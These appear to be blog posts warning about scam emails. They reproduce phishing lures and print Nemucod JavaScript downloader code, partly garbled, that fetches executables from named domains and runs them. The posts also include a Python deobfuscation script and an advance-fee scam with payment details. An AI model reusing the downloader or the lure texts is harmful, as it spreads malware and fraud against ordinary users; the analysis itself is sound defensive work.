Order to Appear in Court

Nothing to see here, folks, just move along. Another scam email from fraudsters trying to get me to download malware to my computer.

This time the JavaScript code wants to go out to startick.com, mrflapper.com, and ihaveavoice2.com (all of which are invalid top-level domains), and then download and install other nasty stuff to my computer.

Here’s the email that this came attached to:

To: [edited]
Subject: Notice of appearance in Court #00928994

From: “District Court” <jimmie.cowan@138-172.static.hkit4u.com>

Notice to Appear,
You have to appear in the Court on the July 27.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.
You can review complete details of the Court Notice in the attachment.
Sincerely,
Jimmie Cowan,
Clerk of Court.
Attached: Notice_to_Appear_00928994.zip

That “notice to appear” attachment is actually a JavaScript file, and it came as garbage that looked like this:

function sah126() { return ’00) {‘; };  function sah125() { return ‘ == 2′; };  function sah210() { return ‘+fr+'; }; function sah86() { return ‘ar dn'; };  function sah105() { return ‘rea'; };  function sah95() { return ‘bj'; };

But as soon as the code runs, it concatenates all those little bits into something that looks like this:

var stroke=”55565C5E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;

function gvi() { return ‘e'; }

function sah() { return ‘val'; }

function dl(fr)l”); v { var b = “w'; };

ww.startick.com mrflapper.com ihaveavoice2.com”.split'; };

(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shelar fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; };'; };

try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; }; }; dl(4851); dl(5382); dl(2753);var po = ”

for (var ckz=1; ckz<=242; ckz++) { po += this[‘sah’+ckz](); } this[gvi()+sah()](po);

I’ve mentioned these a few times before – the only way to keep yourself safe is to never open attachments you receive in email messages unless you are 100% sure whom they are from and what they are.

The bad actors want access to your data and your computer, and they don’t care how they get it.

Be careful out there.

The Old Wolf has spoken.

Spam from China

Why would anyone in their right mind respond to a mail blast like this, especially when it’s in Chinese?

尊敬的客户: 您好! 祝您业务更上一层楼。 我司十多年专为中小企业提供香港公司注册服务。在2014年在香港成立的公司有167279间,在2013年在香港成立的公司有174030间,在经济环境越不好的情况下,老板们更热衷研究并注册离岸公司。在香港成立公司是很简单的事情,两个星期多便可以注册完成,注册资本不需要验资,不需要到位,阁下也不需要到香港。在这些年,我们一直在埋头苦干,精心修炼,力争为您提供更专业的离岸注册服务。一直期待着您的联系。      希望! 本邮件是我们合作的开始.

———

English via Google Translate:

Dear Customer: Hello! I wish your business to the next level. Our ten years designed to provide SMEs in Hong Kong Companies Registry services. The company was established in 2014 in Hong Kong, there are 167,279 in the company in 2013 in Hong Kong has 174,030, in the worse economic environment, the owners are more keen to study and register offshore companies. Set up a company in Hong Kong is a very simple matter, more will be able to register two weeks to complete, registered capital does not require verification, no place, you do not need to go to Hong Kong. During these years, we have been working hard, careful cultivation, strive to provide you with more professional offshore registration services. We have been looking forward to your contact.I hope! This message is the beginning of our cooperation.

Unless they’re targeting people in the mainland, this seems like a phenomenally inefficient way of doing business. On the other hand, it could just be a phishing scam looking for the dumbest of the dumb.

The amount of business that is being done in the world based on dishonesty and deception makes my head hurt.

The Old Wolf has spoken.

Another package of JavaScript malware

I wish I were a JavaScript programmer.

Here’s the code that came to me via email in a .zip file, under the malicious guise of a FedEx delivery label (it was packaged to look like the code you see in my previous post).


var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;

function cwm() { return ‘e'; };

function xn() { return ‘val'; };

function dl(fr) { var b = “dickinsonwrestlingclub.com etqy.com soflectplit(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shell”); var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er)) { return ‘.c {}; if (dn == 1) break; } }; dl(7) { return ‘om”.s971); dl(6202′; };  var xv = ”; ); dl(613);

for (var rlh=1; rlh<=225; rlh++) { xv += this[‘xn’+rlh](); } this[cwm()+xn()](xv);


The email:

To: info@academyofgreatness.com
Subject: Problems with item delivery, n.00000732560

From: “FedEx International MailService” <seth.mcdowell@77.241.83.157.static.hosted.by.combell.com>

Dear Customer,

We could not deliver your item.
Please, download Delivery Label attached to this email.
Yours faithfully,
Seth Mcdowell,
Operation Manager.
FedEx_ID_00000732560.zip

I have said before and will say cheerfully again, Don’t Open Attachments from People You Don’t Know. Just don’t. Files labelled .zip, .exe, .js, or even .doc, .pdf, and others can be malicious. Sadly, too many people suppress the display of file extensions on their machine, because that’s the default Microsoft has herded people into, and it’s dangerous.

The script above goes out to two websites, “dickinsonwrestlingclub.com” which redirects to a Facebook page, and etqy.com. The registration of the first hides behind a privacy wall:
Domain Name: DICKINSONWRESTLINGCLUB.COM
Registry Domain ID: 336832356_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2015-01-29T00:13:33Z
Creation Date: 2006-02-06T15:11:04Z
Registrar Registration Expiration Date: 2017-02-06T05:00:00Z
Registrar: NETWORK SOLUTIONS, LLC.
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Reseller:
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 12808 Gran Bay Parkway West
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32258
Registrant Country: US
Registrant Phone: +1.5707088780
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: h72bn4775k5@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 12808 Gran Bay Parkway West
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32258
Admin Country: US
Admin Phone: +1.5707088780
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: h72bn4775k5@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 12808 Gran Bay Parkway West
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32258
Tech Country: US
Tech Phone: +1.5707088780
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: h72bn4775k5@networksolutionsprivateregistration.com
Name Server: NS1.CTCTEL.COM
Name Server: NS2.CTCTEL.COM
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
The second is registered to someone in Turkey:
Domain Name: etqy.com
Registry Domain ID: 1527531270_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.srsplus.com
Registrar URL: http://srsplus.com
Updated Date: 2014-03-13T20:56:39Z
Creation Date: 2008-11-07T19:15:39Z
Registrar Registration Expiration Date: 2015-11-07T19:15:39Z
Registrar: TLDS LLC. d/b/a SRSPlus
Registrar IANA ID: 320
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8773812449
Reseller:
Domain Status: clientTransferProhibited http://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Ferhat Yilmaz
Registrant Organization:
Registrant Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Registrant City: Istanbul
Registrant State/Province: none
Registrant Postal Code: 34724
Registrant Country: TR
Registrant Phone: +90.90211
Registrant Phone Ext.:
Registrant Fax:
Registrant Fax Ext.:
Registrant Email: info@etqy.com
Registry Admin ID:
Admin Name: Ferhat Yilmaz
Admin Organization:
Admin Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Admin City: Istanbul
Admin State/Province: none
Admin Postal Code: 34724
Admin Country: TR
Admin Phone: +90.90211
Admin Phone Ext.:
Admin Fax:
Admin Fax Ext.:
Admin Email: info@etqy.com
Registry Tech ID:
Tech Name: Ferhat Yilmaz
Tech Organization:
Tech Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Tech City: Istanbul
Tech State/Province: none
Tech Postal Code: 34724
Tech Country: TR
Tech Phone: +90.90211
Tech Phone Ext.:
Tech Fax:
Tech Fax Ext.:
Tech Email: info@etqy.com
Name Server: ns51.1and1.com
Name Server: ns52.1and1.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

The code goes out to these websites and downloads other files, and then runs them. What will happen to your computer next is anyone’s guess. That’s why I wish I knew JavaScript better, so I could determine exactly what was being downloaded and what it is supposed to do.

Whatever the case, stay away from attachments in your email.

The Old Wolf has spoken.

An Illustration: Why you never open those attachments.

I got two emails yesterday, each with an attachment. Both are designed to get people to open whatever malware package they are carrying:

To: [redacted]
Subject: Notice to appear in Court #00000554562

From: “District Court” <nathaniel.berger@realestate-philippines.net>

Notice to Appear,

This is to inform you to appear in the Court on the July 06 for your case hearing.
Please, do not forget to bring all the documents related to the case.
Note: The case will be heard by the judge in your absence if you do not come.
The copy of Court Notice is attached to this email.
Kind regards,
Nathaniel Berger,
Clerk of Court.
Attached: 00000554562.zip

Subject: Indebtedness for driving on toll road #0000133433
To: [redacted]

From: “E-ZPass Manager” <calvin.gleason@adescbrasil.com.br>

Notice to Appear,
You have a unpaid bill for using toll road.
Please, do not forget to service your debt.
You can review the invoice in the attachment.
Sincerely,
Calvin Gleason,
E-ZPass Agent.
E-ZPass_0000133433.zip

Notice that the second email begins the same way: “Notice to appear,” even though it’s a notification of a supposed debt. These were clearly cut/pasted by the same person/group.

So let’s look at that attachment.

The E-Z Pass zip file contains a file called “E-ZPass_0000133433.doc.js”. This is a JavaScript file, and it was immediately quarantined by Microsoft Security Essentials and flagged as TrojanDownloader:JS/Nemucod.P. According to Microsoft, “This program displays deceptive program messages. It downloads and installs other programs onto your PC without your consent, including other malware.”

Clearly, you don’t want to mess with this on your machine. The body of the file looks like this:

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;function igs118() { return ‘4 && ‘; };  function igs236() { return ‘);'; };  function igs101() { return ‘); x'; };  function igs193() { return ‘ x'; };  function igs232() { return ‘3862’; };  function igs3() { return ‘ dl'; };  function igs30() { return ‘i='; };  function igs140() { return ‘a.ty'; };  function igs182() { return ‘} ‘; };  function igs74() { return ‘.rou'; };  function igs162() { return ‘1; x'; };  function igs23() { return ‘com”‘; };  function igs131() { return ‘ect(‘; };  function igs217() { return ‘ } c'; };  function igs228() { return ‘; dl(‘; };  function igs176() { return ‘{ ws'; };  function igs136() { return ‘”); x'; };  function igs141() { return ‘pe ‘; };  function igs97() { return ‘SXML2′; };  function igs192() { return ‘try {‘; };  function igs63() { return ‘(“‘; };  function igs50() { return ‘”);'; };  function igs229() { return ‘6001)'; };  function igs89() { return ‘ar x'; };  function igs66() { return ‘”)+'; };  function igs46() { return ‘WS'; };  function igs19() { return ‘ a'; };  function igs79() { return ‘m()*'; };  function igs186() { return ‘; };'; };  function igs28() { return ‘ (v'; };  function igs29() { return ‘ar ‘; };  function igs117() { return ‘e == ‘; };  function igs216() { return ‘nd();'; };  function igs185() { return ‘r) {}'; };  function igs113() { return ‘ (x'; };  function igs90() { return ‘o ‘; };  function igs72() { return ‘)+'; };  function igs70() { return ‘arCod'; };  function igs49() { return ‘ell'; };  function igs233() { return ‘); d'; };  function igs171() { return ‘ile(‘; };  function igs201() { return ‘]+”/d'; };  function igs166() { return ‘ 0; x'; };  var ci = ”;  function igs127() { return ‘ new ‘; };  function igs40() { return ‘s ='; };  function igs219() { return ‘h ‘; };  function igs206() { return ‘nd=”+'; };  function igs61() { return ‘rin'; };  function igs22() { return ‘ge.'; };  function igs102() { return ‘o.o'; };  
function igs138() { return ‘pen'; };  function igs14() { return ‘cl'; };  function igs111() { return ‘n()'; };  function igs10() { return ‘so'; };  function igs48() { return ‘.Sh'; };  function igs51() { return ‘ v'; };  function igs98() { return ‘.XMLH'; };  function igs167() { return ‘a.'; };  function igs17() { return ‘etqy'; };  function igs42() { return ‘Ac'; };  function igs194() { return ‘o.'; };  function igs129() { return ‘eX'; };  function igs137() { return ‘a.o'; };  function igs91() { return ‘= ‘; };  function igs144() { return ‘a.'; };  function igs159() { return ‘ { d'; };  function igs45() { return ‘t(“‘; };  function igs2() { return ‘ion'; };  function igs92() { return ‘new'; };  function igs18() { return ‘.com'; };  function igs106() { return ‘atec'; };  function igs8() { return ‘”dick'; };  function igs65() { return ‘P%'; };  function igs147() { return ‘e(xo'; };  function igs68() { return ‘g.f'; };  function igs75() { return ‘nd'; };  function igs24() { return ‘.spli'; };  function igs200() { return ‘”+b[i'; };  function igs47() { return ‘cript'; };  function igs227() { return ‘ } }'; };  function igs179() { return ‘n,'; };  function igs161() { return ‘= ‘; };  function igs187() { return ‘ xa'; };  function igs67() { return ‘Strin'; };  function igs34() { return ‘leng'; };  function igs27() { return ‘for'; };  function igs143() { return ‘; x'; };  function igs199() { return ‘tp://'; };  function igs35() { return ‘th; ‘; };  function igs177() { return ‘.R'; };  function igs39() { return ‘ w'; };  function igs4() { return ‘(fr'; };  function igs153() { return ‘f (‘; };  function igs189() { return ‘ose(‘; };  function igs115() { return ‘ead'; };  function igs33() { return ‘b.'; };  function igs1() { return ‘funct'; };  function igs146() { return ‘it'; };  function igs44() { return ‘Objec'; };  function igs145() { return ‘wr'; };  function igs38() { return ‘ var'; };  function igs11() { return ‘nw'; };  function igs108() { return ‘e ‘; };  function 
igs94() { return ‘ve'; };  function igs205() { return ‘p?r'; };  function igs169() { return ‘veT'; };  function igs174() { return ‘); tr'; };  function igs16() { return ‘om ‘; };  function igs105() { return ‘dyst'; };  function igs170() { return ‘oF'; };  function igs83() { return ‘)+”.e'; };  function igs230() { return ‘; d'; };  function igs78() { return ‘rando'; };  function igs149() { return ‘spo'; };  function igs21() { return ‘na'; };  function igs37() { return ‘+) {‘; };  function igs203() { return ‘ume'; };  function igs125() { return ‘ xa'; };  function igs76() { return ‘(Ma'; };  function igs41() { return ‘ new ‘; };  function igs188() { return ‘.cl'; };  function igs134() { return ‘.St'; };  function igs80() { return ‘10000’; };  function igs116() { return ‘yStat'; };  function igs150() { return ‘ns'; };  function igs135() { return ‘ream'; };  function igs114() { return ‘o.r'; };  function igs96() { return ‘ct(“M'; };  function zuw() { return ‘e'; };  function igs215() { return ‘.se'; };  function igs139() { return ‘(); x'; };  function igs62() { return ‘gs'; };  function igs130() { return ‘Obj'; };  function igs222() { return ‘; if ‘; };  function igs218() { return ‘atc'; };  function igs133() { return ‘ODB'; };  function igs207() { return ‘fr+”&'; };  function igs123() { return ‘200) ‘; };  function igs202() { return ‘oc'; };  function igs6() { return ‘var ‘; };  function igs152() { return ‘); i'; };  function igs198() { return ‘”,”ht'; };  function igs148() { return ‘.Re'; };  function igs221() { return ‘) {}'; };  function igs25() { return ‘t(” “‘; };  function igs234() { return ‘l(‘; };  function igs100() { return ‘P”‘; };  function igs209() { return ‘=”+s'; };  function igs165() { return ‘ion ='; };  function igs204() { return ‘nt.ph'; };  function igs104() { return ‘ea'; };  function igs55() { return ‘.Expa'; };  function igs112() { return ‘ { if'; };  function igs99() { return ‘TT'; };  function igs5() { return ‘) { ‘; };  function igs12() { 
return ‘res'; };  function igs178() { return ‘un(f'; };  function igs87() { return ‘ = ‘; };  function igs195() { return ‘op'; };  function igs85() { return ‘; v'; };  function igs214() { return ‘ xo'; };  function igs224() { return ‘ == 1′; };  function igs226() { return ‘reak;'; };  function igs223() { return ‘(dn'; };  function igs124() { return ‘{ var'; };  function igs196() { return ‘en(“G'; };  function igs95() { return ‘XObje'; };  function igs31() { return ‘0; ‘; };  function igs15() { return ‘ub.c'; };  function igs126() { return ‘ ='; };  function igs54() { return ‘ ws'; };  function igs73() { return ‘Math'; };  function igs82() { return ’00′; };  function igs231() { return ‘l(‘; };  function igs119() { return ‘xo.s'; };  function igs107() { return ‘hang'; };  function igs86() { return ‘ar dn'; };  function igs190() { return ‘); }'; };  function igs155() { return ‘.si'; };  function igs213() { return ‘e);'; };  function igs58() { return ‘onm'; };  function igs7() { return ‘b = ‘; };  function igs208() { return ‘id'; };  function igs120() { return ‘ta'; };  function igs121() { return ‘tu'; };  function igs88() { return ‘0; v'; };  function igs71() { return ‘e(92′; };  function igs84() { return ‘xe”‘; };  function igs36() { return ‘i+'; };  function igs122() { return ‘s == ‘; };  function igs109() { return ‘= fu'; };  function igs69() { return ‘romCh'; };  function igs56() { return ‘ndEnv'; };  function igs64() { return ‘%TEM'; };  function igs212() { return ‘als'; };  function igs110() { return ‘nctio'; };  function igs103() { return ‘nr'; };  function igs164() { return ‘posit'; };  function igs173() { return ‘,2′; };  function igs225() { return ‘) b'; };  function igs53() { return ‘fn ='; };  function igs157() { return ‘> 500′; };  function igs151() { return ‘eBody'; };  function igs175() { return ‘y ‘; };  function igs9() { return ‘in'; };  function igs13() { return ‘tling'; };  function igs154() { return ‘xa'; };  function igs32() { return ‘i<‘; };  
function igs59() { return ‘ent'; };  function igs172() { return ‘fn'; };  function igs() { return ‘val'; };  function igs142() { return ‘= 1′; };  function igs81() { return ’00′; };  function igs180() { return ‘1,’; };  function igs57() { return ‘ir'; };  function igs43() { return ‘tiveX'; };  function igs60() { return ‘St'; };  function igs160() { return ‘n ‘; };  function igs191() { return ‘; }; ‘; };  function igs183() { return ‘catch'; };  function igs77() { return ‘th.'; };  function igs52() { return ‘ar ‘; };  function igs235() { return ‘8083’; };  function igs163() { return ‘a.'; };  function igs181() { return ‘0); ‘; };  function igs132() { return ‘”AD'; };  function igs156() { return ‘ze ‘; };  function igs197() { return ‘ET'; };  function igs128() { return ‘Activ'; };  function igs20() { return ‘volo'; };  function igs211() { return ‘, f'; };  function igs93() { return ‘ Acti'; };  function igs168() { return ‘sa'; };  function igs158() { return ‘0)'; };  function igs26() { return ‘); ‘; };  function igs210() { return ‘troke'; };  function igs184() { return ‘ (e'; };  function igs220() { return ‘(er'; }; for (var pn=1; pn<=236; pn++) { ci += this[‘igs’+pn](); } this[zuw()+igs()](ci);

The last statement in the program concatenates all these little scraps of code (listed out of order) into one large statement and then executes it:

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;
{ return valfunction dl(fr) { var b = “dickinsonwrestlingclub.com etqy.com avolonage.com”.split(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shell”); var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; x; }; var ci = ;
a.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; } }; dl(6001); dl(3862); dl(8083);zuwe
for (var pn=1; pn<=236; pn++) { ci += this[‘igs’+pn](); } this[zuw()+igs()](ci);

Now I’m not a JavaScript coder, but I can tell just by looking at it that this will access several compromised or outright malicious websites out there, and then download and run other files which are guaranteed to make your life miserable. At the least, you’ll get advertisements and popups. At worst, you will lose all your data in horrible ways or become part of a spamming network of zombie computers, or have your identity and your financial information stolen and used by criminals. None of these things are appealing.
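The reassembly step described above can be reproduced statically, without ever running the attachment. The following Python is an added example, not code from the original post: it parses the numbered `return '...'` scraps, puts them back in loop order, names the function the result is handed to, and lists the download hosts in defanged form. `SAMPLE` is a harmless constructed input laid out the same way (the `zz`/`qe` names and the `.example` hosts are made up), including the typographic quotes the blog rendering introduced.

```python
import re

# The blog's rendering replaced ASCII quotes with typographic ones (and a
# quote after a digit with a prime); map them back before parsing.
QUOTES = str.maketrans({"‘": "'", "’": "'", "′": "'", "“": '"', "”": '"', "″": '"'})

# function <prefix><n>() { return '<scrap>'; }
FRAGMENT = re.compile(
    r"function\s+([A-Za-z_]\w*?)(\d+)\s*\(\s*\)\s*\{\s*return\s*'([^']*)'\s*;?\s*\}")
# for (var i=1; i<=N; i++) { acc += this['<prefix>'+i](); }
LOOP = re.compile(
    r"for\s*\(\s*var\s+(\w+)\s*=\s*1\s*;\s*\1\s*<=\s*(?P<count>\d+)\s*;[^)]*\)"
    r"\s*\{[^}]*this\[\s*'(?P<prefix>\w+)'\s*\+\s*\1\s*\]")
# this[a()+b()](acc) is the call that executes the rebuilt string
SINK = re.compile(r"this\[\s*(\w+)\(\)\s*\+\s*(\w+)\(\)\s*\]\s*\(")

GAP = "<?>"  # marker for a scrap that is absent from the copy being analysed

# Constructed, harmless sample in the same layout as the attachments.
SAMPLE = """
function zz7() { return ‘”.spli’; };  function zz2() { return ‘ = “al’; };
function zz10() { return ‘);’; };  function zz4() { return ‘ample ‘; };
function zz1() { return ‘var b’; };  function zz9() { return ‘; dl(7′; };
function zz5() { return ‘beta.e’; };  function zz3() { return ‘pha.ex’; };
function zz8() { return ‘t(” “)’; };  function zz6() { return ‘xample’; };
function qe() { return ‘e’; };  function zz() { return ‘val’; };  var out = ”;
for (var n=1; n<=10; n++) { out += this[‘zz’+n](); } this[qe()+zz()](out);
"""


def normalise(src):
    """Undo the typographic-quote substitution."""
    return src.translate(QUOTES)


def reassemble(src):
    """Return (payload, missing_indexes) by text processing only."""
    src = normalise(src)
    loop = LOOP.search(src)
    if loop is None:
        raise ValueError("no fragment-concatenation loop found")
    prefix, count = loop.group("prefix"), int(loop.group("count"))
    scraps = {int(n): body
              for name, n, body in FRAGMENT.findall(src) if name == prefix}
    missing = [i for i in range(1, count + 1) if i not in scraps]
    payload = "".join(scraps.get(i, GAP) for i in range(1, count + 1))
    return payload, missing


def sink_name(src):
    """Resolve this[a()+b()] to the name it spells, e.g. 'e' + 'val'."""
    src = normalise(src)
    call = SINK.search(src)
    if call is None:
        return None
    name = ""
    for helper in call.groups():
        body = re.search(
            r"function\s+%s\s*\(\s*\)\s*\{\s*return\s*'([^']*)'" % re.escape(helper),
            src)
        name += body.group(1) if body else "?"
    return name


def extract_hosts(payload):
    """Hosts from a "a b c".split(" ") list, defanged for safe sharing."""
    hosts = []
    for listing in re.findall(r'"([^"]+)"\.split\(" "\)', payload):
        hosts.extend(listing.split())
    return [h.replace(".", "[.]") for h in hosts]


if __name__ == "__main__":
    payload, missing = reassemble(SAMPLE)
    print("sink   :", sink_name(SAMPLE))
    print("payload:", payload)
    print("missing:", missing)
    print("hosts  :", extract_hosts(payload))
```

A non-empty `missing` list means the copy being analysed is incomplete, so the rebuilt text contains `<?>` gaps and any host list drawn from it should be treated as partial.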

To protect yourself, these two rules should be followed at all times:

  1. Do not click on links. Instead, copy the URL from the email and paste it into your browser. Even better is to simply type the destination name into your browser.
  2. Be suspicious of attachments, and only open those that you are expecting.

There are others, but if everyone would follow these two basic common-sense procedures, the bad actors would have far less access to people’s machines and data.

Protect your loved ones, and be careful out there.

The Old Wolf has spoken.

Protect yourself from Phishing attacks

Great advice from a local business:

  • Be suspicious of any email that requires “immediate action” or creates a sense of urgency. This is a common technique used by criminals to rush people into making a mistake.
  • Be suspicious of emails addressed to “Dear Customer” or some other generic salutation. If it is your bank, they will know your name.
  • Be suspicious of grammar or spelling mistakes; most businesses proofread their messages carefully before sending them.
  • Do not click on links. Instead, copy the URL from the email and paste it into your browser. Even better is to simply type the destination name into your browser.
  • Hover your mouse over the link. This will show you the true destination where you would go if you actually clicked on it. If the true destination of the link is different than what is shown in the email, this may be an indication of fraud.
  • Be suspicious of attachments, and only open those that you are expecting.
  • Just because you got an email from your friend does not mean they sent it. Your friend’s computer may have been infected or their account may have been compromised, and malware is sending the email to all of your friend’s contacts.
  • If you get a suspicious email from a trusted friend or colleague, call them to confirm that they sent it. Always use a telephone number that you already know or can independently verify, not one that was included in the message.

I’ve mentioned most of these in various other posts, but this was an excellent summary that deserved to be shared. Be careful out there.

The Old Wolf has spoken.

A Letter from the “Assistant Secretary of State.”

Please us with this email again! Right, folks – the Bureau of Consular Affairs is going to use a foxmail address. For the love of all that’s holy, never respond to an email like this. If you do, you’re handing your hard-earned money to fleabitten African scammers. YES, THIS IS A SCAM. Yes, I’m SHOUTING!


From: Assistant Secretary of State Roberta Jacobson <Anderson@gamma.ocn.ne.jp>
Subject: Assistant Secretary of State Roberta Jacobson,

To: undisclosed-recipients:;

Bureau of Consular Affairs

Washington, DC 20520
Greeting from USA Embassy,

Attn Dear Citizens! Please us with this email again ( homelandsecurity20@foxmail.com )

This is to notify you that your consignment has been in our custody we are waiting for you to comply with our instructions before your package delivery will be effected to your delivery address. We have been waiting for you to contact us regarding your consignment box which Courier Company suppose to deliver to you which is on hold by USA Home Land Security Department Bureau and requesting for clearance certificate which will be obtain from the origination of the consignment box before it will be released. As a result of you not comply within duration given by Benin Government that is the reason the consignment box was diverted to treasury but the government of American have decide to make the world happy by been willing to release the package consisting of a Bank Draft Total sum of $ 3.5millions usd written with your name as the beneficiary within 4 hours immediately you secure the clearance certificate today.

After the Meeting Held by Our board of Director Which WAS Concluded That the Delivery of your Consignment to your address MUST BE Complete within 4hrs upon your Comply to Our requirement Which IS by sending the sum of  $ 155.00Usd  to enable the origin Obtain the needed certificate and your consignment for onward delivery to your house immediately without any further delay we decide to contact you because we confirm some offices are trying to deceive you.

Note that your consignment box has been arrived in US embassy and waiting to receive clearance certificate before the gate pass is given. Mean while you are advice to reconfirm the below information upon contacting us to avoid delivery to wrong person.

1, Full name:
2, Address:
3, Occupation:
4, Cell-Phone:
5, Nearest Airport:

Once you notify us with the Above Information include with the $ 55 payment we Will release your Consignment to you. Note That you Are expected to pay only  $ 155.00Usd  for Clearance certificate and you Are to pay it to Benin Republic as the origination of the Consignment box in favor of: Ofor Eze as Our accountant officer in Benin Republic Send the  $ 155.00Usd through Western Union or Money gram once you receive this mail with the Information Below for IMMEDIATE release of your Consignment box,

Receiver name: Ofor Eze
Country .. Benin Republic
city .. Cotonou
question: Yes
Answer: Yes.
Amount necessary. $ 155.00usd

Once you send the money, try to notify us with the MTCN for easy pick up and for immediate action on the release of your consignment.

Please treat this as matter of urgency .Note that any uncliam consignment will be return to the Courier Company after 3 days for final divertion as a result of failure to comply with our instruction and claim your consignment which arrived from Africa to our local airport here in USA.

So you are urgently advise to comply with our demand so that we will release your consignment we are working for the best of America citizen.

Treat with dispatch,
Yours Faithfully,
Assistant Secretary of State Roberta Jacobson,
FROM UNITED STATE OF AMERICA
Call +19189363447
Email: homelandsecurity20@foxmail.com

The Lads from Benin are still busy. They may be from Lagos, too – one can never tell where these drones are operating from.

Here’s my response to this one:

[Image: “Nigerian Camels”]

All I can hope is that emails like this raise their blood pressure enough to precipitate a massive stroke…

The Old Wolf has spoken.